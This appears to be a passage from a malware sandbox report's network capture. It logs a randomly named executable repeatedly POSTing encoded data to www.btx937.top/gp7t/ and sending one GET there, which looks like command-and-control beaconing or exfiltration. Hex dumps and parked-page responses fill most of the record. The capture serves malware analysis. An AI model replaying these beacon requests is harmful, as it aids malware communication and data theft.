                                          May 27, 2024 12:44:40.540369034 CEST1236INData Raw: 3d 67 3b 67 2b 2b 29 62 2b 3d 28 22 30 22 2b 70 61 72 73 65 49 6e 74 28 68 5b 67 5d 2c 31 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 32 29 3b 22 30 22 3d 3d 3d 62 2e 63 68 61 72 41 74 28 30 29 26 26 28 64 3d 70 61 72
                                          Data Ascii: =g;g++)b+=("0"+parseInt(h[g],10).toString(16)).slice(-2);"0"===b.charAt(0)&&(d=parseInt(b.substr(0,2),16),d=Math.max(16,d),b=d.toString(16)+b.slice(-4));f.push(c[e][0]+"="+b)}if(f.length){var k=a.getAttribute("data-src"),l=k+(0>k.indexOf("?")?
                                          May 27, 2024 12:44:40.540385008 CEST1236INData Raw: 73 2d 68 6e 20 73 2d 68 6e 2d 64 65 66 61 75 6c 74 20 77 6e 64 2d 6d 74 2d 63 6c 61 73 73 69 63 20 77 6e 64 2d 6e 61 2d 63 20 6c 6f 67 6f 2d 63 6c 61 73 73 69 63 20 73 63 2d 77 20 20 20 77 6e 64 2d 77 2d 77 69 64 65 20 77 6e 64 2d 6e 68 2d 6d 20
                                          Data Ascii: s-hn s-hn-default wnd-mt-classic wnd-na-c logo-classic sc-w wnd-w-wide wnd-nh-m hm-hidden menu-default"><div class="s-w"><div class="s-o"><div class="s-bg"> <div class="s-bg-l"> </div></div><d
                                          May 27, 2024 12:44:40.540401936 CEST1236INData Raw: 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 65 72 3e
                                          Data Ascii: ></div></div></div></div></section></div></div> </header> <main class="l-m cf"> <div class="sw cf"><div class="sw-c cf"><section class="s s-hm s-hm-hidden wnd-h-hidden cf sc-w hn-default"></sec
                                          May 27, 2024 12:44:40.540419102 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 2d 63 20 73 2d 66 2d 6c 2d 77 20 73 2d 66 2d 62 6f 72 64 65 72 22 3e 0d 0a 09 09 09 09 3c 64 69 76
                                          Data Ascii: </div></div><div class="s-c s-f-l-w s-f-border"><div class="s-f-l b-s b-s-t0 b-s-b0"><div class="s-f-l-c s-f-l-c-first"><div class="s-f-cr"><span class="it b link"><span class="it-c">&nbsp;2024
                                          May 27, 2024 12:44:40.540458918 CEST1236INData Raw: 6d 65 69 6c 6c 65 75 72 65 20 65 78 70 c3 a9 72 69 65 6e 63 65 20 75 74 69 6c 69 73 61 74 65 75 72 20 70 6f 73 73 69 62 6c 65 2e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 62 2d 62 61 72 2d 62 75 74 74 6f 6e 73 22 3e 0a
                                          Data Ascii: meilleure exprience utilisateur possible.</div><div class="cb-bar-buttons"><button class="cb-button cb-close-basic" data-action="accept-necessary"><span class="cb-button-content">N'acceptez que le ncessaire</span></butt
                                          May 27, 2024 12:44:40.545402050 CEST1236INData Raw: 63 6b 62 6f 78 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 63 62 2d 6f 70 74 69 6f 6e 2d 6c 61 62 65 6c 22 20 66 6f 72 3d 22 6e 65 63 65 73 73 61 72 79 22 3e 43
                                          Data Ascii: ckbox"></div> <label class="cb-option-label" for="necessary">Cookies essentiels</label><div class="cb-option-text"></div></div></div><div class="cb-popup-footer"><button class="cb-button cb-save-popu


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          29192.168.2.549744199.59.243.22580
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:45.767179012 CEST750OUTPOST /gp7t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Origin: http://www.btx937.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.btx937.top/gp7t/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6d 43 43 6b 74 47 70 7a 7a 6b 77 4d 61 45 67 70 46 54 4a 58 4b 41 38 50 66 4d 39 61 37 38 30 70 2f 42 61 6a 52 6d 6c 65 58 47 2b 6d 78 48 6c 47 79 50 6a 62 52 78 54 31 4a 51 5a 64 45 47 48 78 53 76 49 74 4c 79 63 30 4c 43 53 68 37 58 64 2b 67 54 4b 6a 50 46 76 78 64 47 4c 72 4b 68 64 58 49 6a 58 6e 77 4b 34 6f 67 43 6b 56 71 2b 76 6a 4c 62 6b 33 35 71 2b 44 52 61 61 6a 4b 37 51 30 67 79 6d 6a 51 32 52 32 66 37 52 51 76 33 65 4e 6c 6a 35 63 6f 6c 46 4f 71 62 51 77 5a 5a 79 57 50 39 48 56 49 4d 36 62 31 34 54 4b 76 77 68 38 4c 64 7a 2b 63 5a 6b 52 31 42 6a 31 69 46 42 45 30 6b 54 53 4a 6c 4d 3d
                                          Data Ascii: 4b34ht=mCCktGpzzkwMaEgpFTJXKA8PfM9a780p/BajRmleXG+mxHlGyPjbRxT1JQZdEGHxSvItLyc0LCSh7Xd+gTKjPFvxdGLrKhdXIjXnwK4ogCkVq+vjLbk35q+DRaajK7Q0gymjQ2R2f7RQv3eNlj5colFOqbQwZZyWP9HVIM6b14TKvwh8Ldz+cZkR1Bj1iFBE0kTSJlM=
                                          May 27, 2024 12:44:46.249222040 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:45 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1106
                                          x-request-id: 44cb4576-f8b4-46bd-ab0b-ac6c742fc093
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==
                                          set-cookie: parking_session=44cb4576-f8b4-46bd-ab0b-ac6c742fc093; expires=Mon, 27 May 2024 10:59:46 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 50 72 44 51 39 55 78 54 2b 2f 69 65 49 46 68 76 73 78 58 33 6c 4a 6a 39 65 4d 4f 30 2f 4e 4e 4e 73 4f 66 61 45 4b 56 46 33 43 7a 78 4a 63 2b 48 2b 43 39 64 76 56 51 36 58 4e 69 73 62 39 4f 5a 52 44 4b 6d 63 6e 2b 58 6e 72 2f 4c 62 56 45 32 76 46 34 50 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:46.249265909 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDRjYjQ1NzYtZjhiNC00NmJkLWFiMGItYWM2Yzc0MmZjMDkzIiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.549745199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:48.298798084 CEST770OUTPOST /gp7t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Origin: http://www.btx937.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.btx937.top/gp7t/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6d 43 43 6b 74 47 70 7a 7a 6b 77 4d 59 6b 51 70 57 67 68 58 50 67 38 4d 44 38 39 61 69 4d 30 74 2f 42 47 6a 52 6e 67 46 51 30 71 6d 77 6e 56 47 67 4b 58 62 63 52 54 31 43 77 5a 59 4b 6d 47 7a 53 76 31 51 4c 79 67 30 4c 43 47 68 37 57 4e 2b 67 67 53 6b 4f 56 76 7a 52 6d 4c 70 4f 68 64 58 49 6a 58 6e 77 4b 38 47 67 43 73 56 71 75 2f 6a 4b 2b 51 30 34 71 2b 45 55 71 61 6a 4f 37 51 4b 67 79 6e 77 51 33 64 63 66 34 35 51 76 79 36 4e 6c 32 46 62 6e 6c 46 41 6e 37 52 61 5a 4b 66 44 43 65 58 50 45 64 50 49 72 75 6a 58 6a 6d 4d 57 52 2f 37 57 50 35 49 70 6c 53 72 43 7a 31 67 74 75 48 44 69 58 79 61 50 58 61 6c 55 6e 63 78 74 6e 6c 62 2b 4d 70 77 52 50 37 65 64
                                          Data Ascii: 4b34ht=mCCktGpzzkwMYkQpWghXPg8MD89aiM0t/BGjRngFQ0qmwnVGgKXbcRT1CwZYKmGzSv1QLyg0LCGh7WN+ggSkOVvzRmLpOhdXIjXnwK8GgCsVqu/jK+Q04q+EUqajO7QKgynwQ3dcf45Qvy6Nl2FbnlFAn7RaZKfDCeXPEdPIrujXjmMWR/7WP5IplSrCz1gtuHDiXyaPXalUncxtnlb+MpwRP7ed
                                          May 27, 2024 12:44:48.762960911 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:47 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1106
                                          x-request-id: c9f2efbf-7f9b-4d2a-8cd7-76fa391a4018
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==
                                          set-cookie: parking_session=c9f2efbf-7f9b-4d2a-8cd7-76fa391a4018; expires=Mon, 27 May 2024 10:59:48 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 50 72 44 51 39 55 78 54 2b 2f 69 65 49 46 68 76 73 78 58 33 6c 4a 6a 39 65 4d 4f 30 2f 4e 4e 4e 73 4f 66 61 45 4b 56 46 33 43 7a 78 4a 63 2b 48 2b 43 39 64 76 56 51 36 58 4e 69 73 62 39 4f 5a 52 44 4b 6d 63 6e 2b 58 6e 72 2f 4c 62 56 45 32 76 46 34 50 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:48.763050079 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzlmMmVmYmYtN2Y5Yi00ZDJhLThjZDctNzZmYTM5MWE0MDE4IiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.549746199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:50.828563929 CEST1787OUTPOST /gp7t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Origin: http://www.btx937.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.btx937.top/gp7t/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6d 43 43 6b 74 47 70 7a 7a 6b 77 4d 59 6b 51 70 57 67 68 58 50 67 38 4d 44 38 39 61 69 4d 30 74 2f 42 47 6a 52 6e 67 46 51 31 53 6d 78 55 64 47 6a 74 4c 62 64 52 54 31 42 77 5a 5a 4b 6d 48 72 53 76 73 58 4c 79 74 4c 4c 47 32 68 37 78 4e 2b 70 78 53 6b 48 56 76 7a 5a 47 4c 6f 4b 68 64 43 49 6a 6e 6a 77 4b 4d 47 67 43 73 56 71 6f 62 6a 63 62 6b 30 31 4b 2b 44 52 61 61 76 4b 37 52 6e 67 32 4b 46 51 33 5a 6d 63 4a 5a 51 76 53 4b 4e 69 41 52 62 71 6c 46 43 67 37 52 43 5a 4b 53 54 43 65 4c 44 45 64 4b 54 72 70 50 58 6e 58 4e 70 56 4d 33 77 4e 34 45 55 70 42 58 58 6f 41 6f 2b 6a 6c 2b 58 55 56 75 65 56 70 55 2b 6c 34 30 72 68 51 79 47 61 50 38 2b 43 76 6a 2b 35 76 75 70 34 6d 31 42 61 64 71 68 71 71 56 31 57 43 6b 79 56 38 4f 30 54 4b 31 52 63 45 76 52 2f 6a 63 70 35 49 48 30 36 56 53 56 4e 67 32 5a 38 47 6b 31 75 6c 39 42 4e 32 52 45 62 33 75 46 58 63 65 42 68 77 61 76 6b 46 32 75 30 45 31 44 50 39 2f 54 69 67 55 32 50 2f 75 62 4a 30 48 35 54 48 71 6b 35 50 77 6a 70 4c 5a 75 53 76 44 [TRUNCATED]
                                          Data Ascii: 4b34ht=mCCktGpzzkwMYkQpWghXPg8MD89aiM0t/BGjRngFQ1SmxUdGjtLbdRT1BwZZKmHrSvsXLytLLG2h7xN+pxSkHVvzZGLoKhdCIjnjwKMGgCsVqobjcbk01K+DRaavK7Rng2KFQ3ZmcJZQvSKNiARbqlFCg7RCZKSTCeLDEdKTrpPXnXNpVM3wN4EUpBXXoAo+jl+XUVueVpU+l40rhQyGaP8+Cvj+5vup4m1BadqhqqV1WCkyV8O0TK1RcEvR/jcp5IH06VSVNg2Z8Gk1ul9BN2REb3uFXceBhwavkF2u0E1DP9/TigU2P/ubJ0H5THqk5PwjpLZuSvD7oCK1/hYYPUVpIKzPSk1ypImQGKwEwXxz1pkQL54k/HEAif9BmvtpkwW896Q1RhN7G8omVS2aMmBG3BpUu5Uq3Q9KPmYzZqJMOKbIZ61J659Ec421l/cm4h/DKxR5nNwJZyGWIFW+BK5Q6Q6DD1XyKeMO6iKLLo7D32XmrO6A5S5CQ9nyDzRiRTCI63tpgUsXcADoN+3wbAMmFsaJA/ycVDN6Y7DrXgd7fyrI6lO7tyyNovhsfQ/jwY/IraNHIPcCI+yX9IiT37qHca7Uo8bEo8cqRQn2JFDX5qBsSMUhAax7AeyEGzqoCGnPqxz7fvJXF0iLm2e/i+U8cy/SisPFQOMBFZu4QA24vhYclQAVGEnh+oO8YQkQiWHYQhHmF2zJUdqTS8NP3TejJTYLEUry6rmHJyUvkv0e7DW+8ueS9LmjHtDdn1cN8A2nEXNL2+nAEonnFew4I9FTZHzLKoUi9+c2KEeVYHF5E8d8Yy6bFlOEDRE7RJOe4VHZRoaX7XEab6sEKbB54AJONRz0SueoCfIjYFvht7Z2CUbq02SMCljKyhl9ElsYVPtgvtTUuQsJ7mawWU2Bw8XfSyslhqBwwzocL9VL9oqYOYm2ULeOD4/G/yWOfGNih3s/RePQUSsrm2UjzPXF4jxdRXIVERmP2pcvPnkhAIwgZ [TRUNCATED]
                                          May 27, 2024 12:44:51.286164045 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:50 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1106
                                          x-request-id: 697ffe86-c85d-4ca2-94e7-a627aefde949
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==
                                          set-cookie: parking_session=697ffe86-c85d-4ca2-94e7-a627aefde949; expires=Mon, 27 May 2024 10:59:51 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 50 72 44 51 39 55 78 54 2b 2f 69 65 49 46 68 76 73 78 58 33 6c 4a 6a 39 65 4d 4f 30 2f 4e 4e 4e 73 4f 66 61 45 4b 56 46 33 43 7a 78 4a 63 2b 48 2b 43 39 64 76 56 51 36 58 4e 69 73 62 39 4f 5a 52 44 4b 6d 63 6e 2b 58 6e 72 2f 4c 62 56 45 32 76 46 34 50 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:51.286216974 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjk3ZmZlODYtYzg1ZC00Y2EyLTk0ZTctYTYyN2FlZmRlOTQ5IiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.549747199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:53.365787029 CEST501OUTGET /gp7t/?4b34ht=rAqEu2gSv2s2Q34sajdUQRUadeB85tkFqSKdenQDQ2DGw2dO3uX5Zw6KDTM8IV3Tf+lQDmhmNxGX2EN4uh2PDjjxVn+OEzZBTy/UzpMaoQhQyJClBqNmt4mNfKWMNb1t7Q==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:53.954135895 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:53 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1498
                                          x-request-id: 5137060e-5c6c-4927-bea7-83ab473b4daa
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cHRUdIm2s7+8fRhV/we/x5yvmLfQlfVFyj3Xrx2fqxPLubD6RgF1gGt+Gxi2rmV9r7NUgFShV4vvWzBFgo3K0g==
                                          set-cookie: parking_session=5137060e-5c6c-4927-bea7-83ab473b4daa; expires=Mon, 27 May 2024 10:59:53 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 48 52 55 64 49 6d 32 73 37 2b 38 66 52 68 56 2f 77 65 2f 78 35 79 76 6d 4c 66 51 6c 66 56 46 79 6a 33 58 72 78 32 66 71 78 50 4c 75 62 44 36 52 67 46 31 67 47 74 2b 47 78 69 32 72 6d 56 39 72 37 4e 55 67 46 53 68 56 34 76 76 57 7a 42 46 67 6f 33 4b 30 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
